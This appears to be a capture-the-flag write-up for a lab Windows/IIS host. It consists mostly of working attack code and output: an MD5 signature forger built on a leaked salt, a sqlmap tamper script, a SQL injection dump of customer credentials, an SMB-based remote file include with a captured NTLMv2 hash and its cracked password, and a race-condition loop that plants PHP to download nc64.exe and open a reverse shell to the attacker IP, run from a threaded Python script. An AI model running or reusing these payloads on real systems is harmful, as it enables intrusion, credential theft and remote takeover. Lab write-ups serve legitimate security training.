Intelligence Foothold Write Up

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-10 03:30 UTC
Nmap scan report for 10.10.10.231
Host is up (0.023s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: OS Tidy Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.46 seconds
/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b
define('SECURE_PARAM_SALT','hie0shah6ooNoim');
#!/usr/bin/env python3
"""Append the site's anti-tamper signature to a query-string payload.

The signature is MD5(SECURE_PARAM_SALT + payload); the salt value is the
one disclosed in the page source quoted above. Once a server-side secret
like this is exposed, the check no longer proves anything and the salt
has to be rotated.  Usage: script.py PAYLOAD
"""
import sys
import hashlib

payload = sys.argv[1]
salted = f"hie0shah6ooNoim{payload}".encode()
signature = hashlib.md5(salted).hexdigest()
print(f"{payload}&h={signature}")
#!/usr/bin/env python3
import hashlib
from urllib.parse import quote_plus
from lib.core.enums import PRIORITY
def tamper(payload, **kwargs):
    """sqlmap tamper hook: sign each injected payload with the site's salt.

    Returns the URL-encoded payload followed by ``&h=<md5>``, where the
    digest is MD5(salt + raw, un-encoded payload). ``kwargs`` is part of
    sqlmap's hook signature and is not used here.
    """
    signature = hashlib.md5(f"hie0shah6ooNoim{payload}".encode()).hexdigest()
    return f"{quote_plus(payload)}&h={signature}"
?order=1
?order=1` OR 1=1
sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamper/tamp.py --dbs --batch --skip-urlencode
available databases [3]:
[*] cleaner
[*] information_schema
[*] test
sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamper/tamp.py -D cleaner -T customers -C customer_name,id,login,password --dump --batch --skip-urlencode
Vikki Solomon
vikki.solomon@throwaway.mail
7c6a180b36896a0a8c02787eeafb0e4c
view-source:http://10.10.10.231/licenses/licenses.php?theme=&h=9094e65be4a9dc27cd4af70674a99c64
<!-- [2] file_get_contents(/header.inc): failed to open stream: No such file or directory
On line 35 in file C:\inetpub\wwwroot\functions.php
30 |
31 | // Following function securely includes a file. Whenever we
32 | // will encounter a PHP tag we will just bail out here.
33 | function secure_include($file) {
34 | if (strpos(file_get_contents($file),'<?') === false) { <<<<< Error encountered in this line.
35 | include($file);
36 | } else {
37 | http_response_code(403);
38 | die('Forbidden - Tampering attempt detected.');
39 | }
40 | }
// -->
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -ip 10.10.14.252 -smb2support jaquarh smb/.
view-source:http://10.10.10.231/licenses/licenses.php?theme=//10.10.14.252/jaquarh&h=07c866da1ae488edd68b22a2565393bf
web::PROPER:aaaaaaaaaaaaaaaa:2973a2127f086cc49af7f4bb7636c85e:01010000000000008046abc1a575d701cc009d7f75076fc900000000010010006d005000770054006f004b0045004a00030010006d005000770054006f004b0045004a00020010005900670072004c007400560075005100040010005900670072004c007400560075005100070008008046abc1a575d7010600040002000000080030003000000000000000000000000020000067b0f46c00d5d9fd16d72e09c70f660ab7c9c0fc4768e7c1b670bc799e8441640a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003200350032000000000000000000
web:charlotte123!
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -ip 10.10.14.252 -username web -password charlotte123! -smb2support jaquarh smb/.
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:JAQUARH)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:JAQUARH)
[*] Closing down connection (10.10.10.231,51250)
[*] Remaining connections []
<!-- [2] file_get_contents(//10.10.14.252/jaquarh/header.inc): failed to open stream: No such file or directory
On line 35 in file C:\inetpub\wwwroot\functions.php
30 |
31 | // Following function securely includes a file. Whenever we
32 | // will encounter a PHP tag we will just bail out here.
33 | function secure_include($file) {
34 | if (strpos(file_get_contents($file),'<?') === false) { <<<<< Error encountered in this line.
35 | include($file);
36 | } else {
37 | http_response_code(403);
38 | die('Forbidden - Tampering attempt detected.');
39 | }
40 | }
// -->
#!/bin/bash
# Rewrite header.inc on the attacker-hosted share in a tight loop.
# secure_include() in the functions.php excerpt above reads the file once
# to look for a '<?' tag and then reads it again for include(); presumably
# the loop exists so the two reads can observe different contents (a
# time-of-check/time-of-use gap). The defensive fix is to read the content
# once and include that buffer, rather than re-reading a remote path.
while((1))
do
echo '<?php echo 'done'; system('cmd /c powershell iwr http://10.10.14.252/nc64.exe -outf nc64.exe'); system('cmd /c start nc64exe -e cmd 10.10.14.252 9001') ?>' > header.inc
done
#!/usr/bin/env python3
import requests
import random
import threading
def thd() -> None:
    """Worker: repeatedly log in as the dumped customer and request the
    share-hosted theme while the file on the share is being rewritten.

    Each iteration is one full session (login, page load, theme request,
    logout); 100 iterations per thread. The response body is printed only
    when it contains the marker string the included file is expected to emit.
    """
    _ = 0
    while _ < 100:
        req = requests.session()
        login_url = "http://10.10.10.231/licenses/index.php"
        # Credentials: the customer row dumped earlier; the plaintext is
        # presumably recovered from the MD5 hash shown above (not on the page).
        data = {"username":"vikki.solomon@throwaway.mail", "password":"password1"}
        res = req.post(url=login_url, data=data)
        index_url = "http://10.10.10.231/licenses/licenses.php"
        res = req.get(url=index_url)
        # theme= points at the attacker's share; h= is presumably produced
        # with the signing helper above, since the salt is known.
        payload_url = "http://10.10.10.231/licenses/licenses.php?theme=//10.10.14.252/rekt&h=b3f129945f358c3d9168614c18a893c8"
        res = req.get(url=payload_url)
        if "hacked" in res.text:
            print(res.text)
        logout_url = "http://10.10.10.231/licenses/logout.php"
        res = req.get(url=logout_url)
        _ += 1
# Start five workers. There is no join(); because the threads are not
# daemons, the interpreter only exits once all of them have finished.
poll = []
for i in range(0, 5):
    single_thd = threading.Thread(target=thd)
    poll.append(single_thd)
for n in poll:
    n.start()
C:\inetpub\wwwroot\licenses>whoami
whoami
proper\web
